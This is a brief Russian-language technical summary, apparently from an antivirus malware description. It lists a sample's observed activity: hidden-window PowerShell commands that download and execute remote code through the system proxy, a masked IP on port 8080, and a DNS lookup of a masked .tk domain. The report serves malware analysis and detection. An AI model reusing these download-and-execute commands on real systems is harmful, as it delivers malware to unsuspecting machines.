Техническая информация
- '<SYSTEM32>\cmd.exe' /c start PoWersHelL.Exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downlo...
- '5.#.79.214':8080
- DNS ASK dl#####le-a###ytics.tk
- '<SYSTEM32>\cmd.exe' /c start PoWersHelL.Exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downlo...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('hTTp://5.#.#9....